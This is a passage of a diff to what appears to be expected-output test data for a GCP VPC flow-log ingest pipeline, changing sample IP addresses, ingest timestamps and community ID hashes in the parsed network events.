@@ -24522,8 +24522,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869298700Z", - "original": "{\"insertId\":\"14iipwlfd8t01o\",\"jsonPayload\":{\"bytes_sent\":\"361966\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"80\",\"reporter\":\"SRC\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392542600Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01o\",\"jsonPayload\":{\"bytes_sent\":\"361966\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"80\",\"reporter\":\"SRC\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466868771Z", "end": "2019-06-14T03:49:37.933154111Z", @@ -24550,17 +24550,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 51950, "bytes": 1457, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:pHA6HHmyea3zNeMwTBqwG+WoGI0=", + "community_id": "1:jcjE3OEEgs/JCmhTXaJJ97LHMMA=", "bytes": 1457, "transport": "tcp", "type": "ipv4", @@ -24574,7 +24574,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, 
@@ -24599,8 +24599,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869301600Z", - "original": "{\"insertId\":\"14iipwlfd8t01p\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":51950},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392546400Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01p\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51950},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:41:50.645030007Z", "end": "2019-06-14T03:41:50.757658840Z", @@ -24621,9 +24621,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58658, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -24637,7 +24637,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:O0CO0+ucLIQiJqFN7AsbDZv6vyc=", + "community_id": "1:dsMvRAsck5r3/JXfFORCHfiL8IQ=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -24652,7 +24652,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { 
@@ -24676,8 +24676,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869304200Z", - "original": "{\"insertId\":\"14iipwlfd8t01e\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":58658,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392550800Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01e\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58658,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:49:50.733935895Z", "end": "2019-06-14T03:49:50.856250208Z", @@ -24704,17 +24704,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 59924, "bytes": 1467, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:T0Rv8TiMkVLDs+lIQf8LeL2yG4A=", + "community_id": "1:6chxyTuZx655lb71dq3THmRLfyY=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -24728,7 +24728,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -24753,8 +24753,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869306900Z", - "original": "{\"insertId\":\"14iipwlfd8t01q\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":59924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392556300Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01q\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":59924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:41:08.092659117Z", "end": "2019-06-14T03:41:08.213471928Z", @@ -24781,17 +24781,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58658, "bytes": 1461, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:O0CO0+ucLIQiJqFN7AsbDZv6vyc=", + "community_id": "1:dsMvRAsck5r3/JXfFORCHfiL8IQ=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -24805,7 +24805,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, 
@@ -24830,8 +24830,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869309600Z", - "original": "{\"insertId\":\"14iipwlfd8t01i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":58658},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392560400Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58658},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:49:50.733935895Z", "end": "2019-06-14T03:49:50.856250208Z", @@ -24854,9 +24854,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65272, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -24870,7 +24870,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Oo7JpkYAgptDkVqBTaGUMnHqiYQ=", + "community_id": "1:AkP1aSEJH9bFKIOkOHf1rOVHNwk=", "bytes": 123732, "transport": "tcp", "type": "ipv4", @@ -24885,7 +24885,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -24909,8 +24909,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869312200Z", - "original": "{\"insertId\":\"14iipwlfd8t01k\",\"jsonPayload\":{\"bytes_sent\":\"123732\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65272,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"618\",\"reporter\":\"SRC\",\"rtt_msec\":\"123\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392564500Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01k\",\"jsonPayload\":{\"bytes_sent\":\"123732\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65272,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"618\",\"reporter\":\"SRC\",\"rtt_msec\":\"123\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.403442252Z", "end": "2019-06-14T03:49:56.316981133Z", @@ -24939,17 +24939,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65273, "bytes": 76342, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 710 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:12d2Qz5iuI+gHCcFYKHiK+jTFKY=", + "community_id": "1:f+7WLGF1FDb2ZMudfLtDGfB3+gQ=", "bytes": 76342, "transport": "tcp", "type": "ipv4", @@ -24963,7 +24963,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -24988,8 +24988,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869314800Z", - "original": "{\"insertId\":\"14iipwlfd8t01f\",\"jsonPayload\":{\"bytes_sent\":\"76342\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65273},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"115\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392567800Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01f\",\"jsonPayload\":{\"bytes_sent\":\"76342\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65273},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"115\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.155378287Z", "end": "2019-06-14T03:49:56.316930467Z", @@ -25012,9 +25012,9 @@ "as": { "number": 4847 }, - "address": "192.0.2.73", + "address": "192.168.2.73", "port": 45224, - "ip": "192.0.2.73" + "ip": "192.168.2.73" }, "source": { "address": "10.73.186.17", @@ -25028,7 +25028,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:rKlCjiIPAcL1SMVo+HVqssXpCbA=", + "community_id": "1:ppuocaYwNMzpWOs4nDw/orHgE7E=", "bytes": 9761, "transport": "tcp", "type": "ipv4", @@ -25043,7 +25043,7 @@ "related": { "ip": [ "10.73.186.17", - "192.0.2.73" + "192.168.2.73" ] }, "gcp": { 
@@ -25067,8 +25067,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869317400Z", - "original": "{\"insertId\":\"14iipwlfd8t018\",\"jsonPayload\":{\"bytes_sent\":\"9761\",\"connection\":{\"dest_ip\":\"192.0.2.73\",\"dest_port\":45224,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"end_time\":\"2019-06-14T03:44:23.955039461Z\",\"packets_sent\":\"13\",\"reporter\":\"SRC\",\"rtt_msec\":\"242\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392572200Z", + "original": 
"{\"insertId\":\"14iipwlfd8t018\",\"jsonPayload\":{\"bytes_sent\":\"9761\",\"connection\":{\"dest_ip\":\"192.168.2.73\",\"dest_port\":45224,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"end_time\":\"2019-06-14T03:44:23.955039461Z\",\"packets_sent\":\"13\",\"reporter\":\"SRC\",\"rtt_msec\":\"242\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:42:23.705320616Z", "end": "2019-06-14T03:44:23.955039461Z", @@ -25095,17 +25095,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 56410, "bytes": 1467, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:0c52Gpv2d5YT01CRixtDXpBMSJQ=", + "community_id": "1:4Pc6C8KshAP3IEqmZaW0jzA00wQ=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -25119,7 +25119,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -25144,8 +25144,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869320Z", - "original": "{\"insertId\":\"14iipwlfd8t01a\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":56410},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"37\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392577900Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01a\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56410},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"37\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_